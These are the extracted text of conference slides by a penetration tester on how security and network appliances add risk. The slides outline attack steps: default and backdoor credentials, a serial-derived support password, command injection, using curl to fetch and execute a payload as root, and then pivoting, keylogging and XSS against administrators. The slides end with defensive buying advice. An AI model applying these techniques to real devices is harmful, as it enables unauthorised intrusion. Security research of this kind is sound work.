Addition by Subtraction: How
Networked Devices Affect your Security
Chris Campbell
BSidesPR
�TL;DR
Network security can be improved by removing
security appliances and other devices which
introduce unnecessary risk.
�Who am I?
Chris Campbell (@obscuresec)
Former Army Signal Officer
Security Researcher/Penetration Tester
Spoken at Derbycon, BlackHat, Shmoocon Firetalks,
BsidesLV
PowerShell fan and contributer to PowerSploit
�Who do I speak for?
I do not speak for anyone but myself
This research was individually conducted and
should be considered free-search
�Who are you?
Managers
Administrators
Auditors
Penetration Testers
Vendors
Students
�Story Time
You never forget your first
�Attack Diagram
�Still Out There
ShodanHQ shows that they are exposed
�What I Learned
Just because a product solves a security
problem doesnt mean it is secure.
Anyone can find vulnerabilities.
These types of devices are a perfect place to
hide from incident handlers.
�Started Collecting
Remote Access Appliances
Cososys Endpoint Protector
McAfee Email and Web Gateway
EdgeWave Iprism Web Proxy
ForeScout Counteract
Barracuda Spam & Virus Firewall
Servgate Edgeforce M30
Celestix Scorpio RAS3000
Qualys Qualysguard Scanner
Bluelane Patchpoint
MRV LX Series Console Server
Avaya ASG Guard Secure Access
Server
Network and Monitoring Appliances
Infoblox Trinzic Network Services
Riverbed Steelhead
ManageEngine Opmanager
Alert-on-Failure (AOF) Enterprise
Mutiny Technology Mutiny
Appliance
Security and Firewall Appliances
Other Appliances
Google Search Appliance
Symantec Opscenter
InfoBlox IPAM
EMC Clariion
F5 Big-IP Appliance
�Procurement
Craigslist, eBay and borrowed from friends
Fully-functional demos from vendor's
websites
Virtual appliance marketplace
�Arent appliances expensive?
�Storage Issues
�Testing a New Device
Image (backup) HDDs and RTFM
Put in lab network (isolated)
Testing
Port scan with NMAP/NSE scripts
Look for known vulnerabilities with services
Login with default credentials
Looked for ways to gain root OS privileges
Identify features that could be used by an attacker
�Before we move on, lets get real!
Your enterprise goes from this
�To this
�With 1 of these
�Reasons to Attack Appliances/Devices
Powerful Linux OS
Ability to leverage Python, Lua, Ruby and Bash
Tools like Netcat, Nmap, TCPDump and others
Privileged network segment
Difficult IR environment
Admins probably dont even have root access
Best place to persist in an enterprise
�What is an appliance?
Could be virtualized, but typically:
Out-dated server hardware (cheap)
Open-Source Operating System (Linux)
A few security tools
Web Application to manage and audit
�Why your boss buys them
blocks both known and unknown attacks with
100% accuracy.
provides complete security protection against all
attacks.
protected against compromise by any potential
attackers.
operates without human intervention or manual
updates.
�Example 1: Network Monitoring
�Examine Open Ports
SSH is open, but we dont know the root
password
HTTP has default passwords
�Where to find the default password?
�What if I change the password?
Backdoor accounts with default passwords
Many appliances limit length and complexity
Lots of tools to brute-force (e.g. Fireforce)
Custom dictionaries are effective
�Now What?
Easiest vuln to find is Cmd Injection
Commonly in troubleshooting utilities
Great for persistence on RO file systems
�But how do you get Root?
Use Curl to pull down payload and execute
Since webapp is running as root we can
�Thanks Juan!
�Example 2: Security Appliance
�Scan and Enumerate
Vulnerable FTP service
running
Web interface for
management
SSH is enabled but no
credentials provided
�Different Approach: Ask
�Support Procedures
Documentation revealed that remote access
was possible for remote support
Is the password static or derived?
�What does it mean?
Script calculates sum of
each number in 10-digit
serial number
91 possible outcomes
�SSH in and sudo to root!
�Example 3: The Other Security
�Isolate and Scan
�Remote Access?
�Backdoor?
�Monitor the Device
�Where are my passwords going?
�Free Features!
�Im sure my passwords are safe.
�What to do from here?
Privileged Network Location
Server segment or VLAN could be trusted
Attack enterprise with PTH-Suite
Attacks against Administrators
Full access to servers is way worse than a normal XSS
Think malicious iframes or Java applets on every page
Admins arent browsing with elevated privileges are they?
Keylog /capture credentials
Domain Authentication
Password reuse to other networked devices
�What is better than a XSS vuln?
XSS Features!
�Recommendations
Don't immediately trust the vendor
Especially those that claim to stop unknown attacks with 100%
accuracy
Look at their security track record on security sites
Securityfocus, exploit-db and osvdb are a good start
No vulnerabilities disclosed != good sign
Assess your current appliances and evaluate demos of all
networked devices before purchasing
Ask to see previous security test results from the vendor
Use a systematic approach but think like an attacker
Look for vulnerabilities like those documented by OWASP
Document potential vulnerabilities and share your findings
Think about how you will sanitize and dispose of the device
�Recommendations (2)
Segment them from your enterprise
Many organizations drown in data from continuous monitoring
Eliminating unfamiliar and untested architectures could improve
your overall posture: If you dont need them, get rid of them
Train yourself and your team
Do internal training (e.g. brown-bag lunches)
Attend and participate in security conferences like Blackhat and
Bsides
Read security blogs
Demand control
Ask if the vendor gives you root control before purchasing
Ask how the appliance stores passwords
If they don't, don't buy it
Until we make real security a financial priority, vendors wont fix
�What did you do with that hardware?
�Questions?
@obscuresec
www.obscuresec.com
Thanks to Matt, Josh,
Juan, Carlos, Skip & the
whole BsidesPR crew!
